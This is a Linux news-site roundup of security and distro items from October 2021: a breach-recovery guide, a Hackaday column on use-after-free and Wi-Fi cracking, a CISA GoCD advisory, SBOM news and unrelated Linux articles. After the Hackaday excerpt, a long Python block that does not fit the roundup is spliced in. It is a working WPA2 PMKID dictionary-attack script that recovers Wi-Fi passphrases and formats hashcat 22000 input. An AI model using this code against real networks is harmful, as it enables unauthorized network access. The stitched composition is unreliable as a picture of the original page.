
Security Leftovers

Submitted by Roy Schestowitz on Friday 29th of October 2021 07:41:30 PM
Security
  • #6 Cybersec Charcha: What comes after Breach Pe Breach?

    In previous editions of Cybersec Charcha, we discussed what you could do to protect your data from being stolen and how to best implement strong digital security practices to protect yourself and your sensitive information. However, we haven’t yet looked at what you can do to take back control — if your data has already been compromised in a data breach.

    Data breaches are now becoming increasingly common. In 2021 alone, we have seen some of the most serious instances of data breaches — both in India and around the world. In a scenario like this, it becomes really important to learn not only how you can protect yourself, but also the measures you can take if your data is leaked in a data breach.

    In the sixth edition of Cybersec Charcha, we’ll be exploring what you can do to take back control in the aftermath of a data breach.

  • This Week In Security: Use-After-Free For Dummies, WiFi Cracking, And PHP-FPM | Hackaday

    In a brilliant write-up, [Stephen Tong] brings us his “Use-After-Free for Dummies”. It’s a surprising tale of a vulnerability that really shouldn’t exist, and a walkthrough of how to complete a capture the flag challenge. The vulnerable binary is running on a Raspberry Pi, which turns out to be very important. It’s a multithreaded application that uses lock-free data sharing, through a pair of integers readable by multiple threads. Those ints are declared using the volatile keyword, which is a useful way to tell a compiler not to optimize too heavily, as this value may get changed by another thread.

    [...]

    [Ido Hoorvitch] of CyberArk had some pandemic-induced time on his hands, and opted to collect packet captures of 5000 password-protected WiFi networks around Tel Aviv. In the old days, you had to capture a 4-way handshake to have any chance at breaking WPA encryption. In 2018 a new technique was discovered, where a single authentication response was all that was required to attempt to crack the key — no active user required.

  • GoCD Authentication Vulnerability | CISA

    GoCD has released a security update to address a critical authentication vulnerability in GoCD versions 20.6.0 through 21.2.0. GoCD is an open-source Continuous Integration and Continuous Delivery system. A remote attacker could exploit this vulnerability to obtain sensitive information.

  • Codenotary: Notarize and verify your software bill of materials [Ed: At ZDNet, SJVN has become a lot like a marketing operative of Linux Foundation because that's a client. The problem is, the Linux Foundation and Linux aren't the same thing. SJVN leans to the money, not GNU/Linux.]

    The Solarwinds software supply chain attack is the one everyone knows about. But supply chain attacks are becoming commonplace, and that's bad news. There are efforts afoot, such as the Linux Foundation's Software Package Data Exchange® (SPDX) project, which ensures transparency and improves compliance for software bill of materials (SBOM). But, we need SBOMs now.
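The "single authentication response" technique mentioned in the Hackaday item above is the PMKID attack: an access point that supports roaming includes a PMKID in the first EAPOL-Key frame of the handshake, and that value is a keyed hash of the pairwise master key (PMK), so a captured PMKID can be checked offline against candidate passphrases with no client present. The example below is added here to show the arithmetic; it is not code from Hackaday, CyberArk or hashcat. The network name, MAC addresses, passphrase and wordlist are constructed, and the "captured" PMKID is computed inside the block from the constructed passphrase so the code runs offline. The PMK derivation (PBKDF2-HMAC-SHA1 over the SSID, 4096 rounds) and PMKID construction (HMAC-SHA1 over the string "PMK Name" and the two MACs, truncated to 128 bits) follow the WPA2-PSK definitions; the last helper emits the line layout hashcat documents for its mode 22000 PMKID entries, so a real capture can be handed to the tool instead of this toy loop.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed values (not from any real capture). In practice the SSID and both
# MACs come from the 802.11 headers and the PMKID from the RSN PMKID KDE of the
# first EAPOL-Key frame the AP sends.
SSID = "CoffeeShop"
AP_MAC = "00:11:22:33:44:55"
STA_MAC = "66:77:88:99:aa:bb"
_REAL_PASSPHRASE = "sunshine2021"  # what the constructed "victim" network uses


def mac_to_bytes(mac: str) -> bytes:
    """'00:11:22:33:44:55' -> b'\\x00\\x11\\x22\\x33\\x44\\x55' (':' or '-' separators)."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).

    This is the expensive step, which is why the attack is a dictionary attack
    rather than a key-recovery attack.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: str, sta_mac: str) -> bytes:
    """PMKID = Truncate-128(HMAC-SHA1(PMK, "PMK Name" || AA || SPA)).

    AA is the authenticator (AP) MAC, SPA the supplicant (station) MAC.
    """
    data = b"PMK Name" + mac_to_bytes(ap_mac) + mac_to_bytes(sta_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def crack_pmkid(pmkid_hex: str, ssid: str, ap_mac: str, sta_mac: str,
                candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose PMKID matches the captured one, else None."""
    target = bytes.fromhex(pmkid_hex)
    if len(target) != 16:
        raise ValueError("PMKID must be exactly 16 bytes")
    for candidate in candidates:
        # 802.11 limits PSK passphrases to 8..63 characters; skip anything else
        # before paying for the PBKDF2 derivation.
        if not 8 <= len(candidate) <= 63:
            continue
        guess = compute_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def hashcat_22000_line(pmkid_hex: str, ap_mac: str, sta_mac: str, ssid: str) -> str:
    """hashcat mode 22000 line for a PMKID entry (type 01).

    Layout: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***  (the anonce, EAPOL and
    message-pair fields only apply to type 02 handshake entries and stay empty).
    """
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid_hex,
        ap_mac.replace(":", "").lower(),
        sta_mac.replace(":", "").lower(),
        ssid.encode().hex(),
    )


# Constructed "capture": derived from the chosen passphrase so the block is self-contained.
CAPTURED_PMKID_HEX = compute_pmkid(derive_pmk(_REAL_PASSPHRASE, SSID), AP_MAC, STA_MAC).hex()

# Constructed wordlist; "letmein" is too short to be a valid PSK and is skipped.
WORDLIST = ["password", "12345678", "letmein", "coffeeshop", "sunshine2021", "qwertyuiop"]

if __name__ == "__main__":
    print("captured PMKID :", CAPTURED_PMKID_HEX)
    print("hashcat 22000  :", hashcat_22000_line(CAPTURED_PMKID_HEX, AP_MAC, STA_MAC, SSID))
    print("recovered PSK  :", crack_pmkid(CAPTURED_PMKID_HEX, SSID, AP_MAC, STA_MAC, WORDLIST))
```

Two things worth noting from the code: the SSID is the PBKDF2 salt, so a PMK (and therefore a PMKID) cannot be precomputed for a network whose name is unique, and the only thing standing between an attacker with this frame and the network is the passphrase's resistance to a dictionary attack, which is why the CyberArk write-up's results hinge on people using phone numbers and other guessable strings. Capturing the frame and the legality of doing so on networks you do not own are outside what this snippet covers.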

How Ubuntu Brought My Ancient Chromebook Back from the Dead

Alright, I’m not exactly Dr Frankenstein, but I did exhume the corpse of a forgotten Chromebook from its eternal resting place (my bookcase) to enact a macabre ritual. My goal? To bring it back to life. Thankfully I didn’t need any spare body parts or a maniacal god complex for my resurrection, just a few choice terminal commands and an Ubuntu-based Linux distro called Gallium OS. I’ll get to what Gallium OS is in a bit, but first I need to answer the question you’re probably thinking in your head: “Chromebooks run Chrome OS. It is a Gentoo-based Linux distro. Why do you need to do this?”. Read more

Looking back on 30 years of Linux history with Red Hat's Ethan Dicks

I first encountered Linux through the Usenet post because I was a very avid Usenet reader and contributor—starting in about ‘85 or so. I saw the Andrew Tanenbaum post about the release of Minix and newsgroups were created for that, so that was an exciting chance to have [something like] Unix on desktop-grade hardware. I’d been running Unix at work since ‘84, ‘85 and had tried (on a number of occasions) to gather enough hardware to be able to run it at home and just really couldn't ever afford to put it together because disks were expensive. I remember when that famous first message came out from Linus [Torvalds]. I was not a PC guy at the time. By April of 1992, which was five months after that announcement, I was at a computer show at a fairgrounds and felt that things had gotten cheap enough. So, I went and bought a 386 motherboard and four megabytes of RAM (in April of 1992, it was $35 per megabyte!) specifically to run Linux, popped on a drive, brought it home and put together a PC. Read more

The 5 Best FTP Clients for Linux

Want to transfer files to and from a remote server in Linux? Check out these powerful FTP clients that will help you transfer your data securely. FTP or File Transfer Protocol is the most common method of transferring files between computers over a network. It's also the go-to option to move large amounts of files back and forth from/to a server. As such, you'll find a variety of FTP clients, depending on your operating system, to help you with the same, each promising to deliver better transfer and management features than the other while staying true to its core functionality. Read more

Distrowatch Top 5 Distributions Review: EndeavourOS

It's no secret to anyone who has read my distro reviews in the past that I love Arch and Arch based systems...and EndeavourOS is no exception. If you love Arch, and you want Arch with a nice graphical installer, easy desktop environment choosing and installation, minimal bloat, and a great and friendly community, give EndeavourOS a try; I highly doubt you will be disappointed. Frankly, I have used EndeavourOS multiple times in the past, and I always come back to it unless I need an Ubuntu system or something else for some specific reason. I used to use Manjaro a lot, but EndeavourOS took my #1 spot when it came to Arch based systems. But, with that said, Manjaro and other systems are absolutely awesome too, and have some perks that EndeavourOS does not; but I'll save that for the Manjaro review coming in the near future. Read more

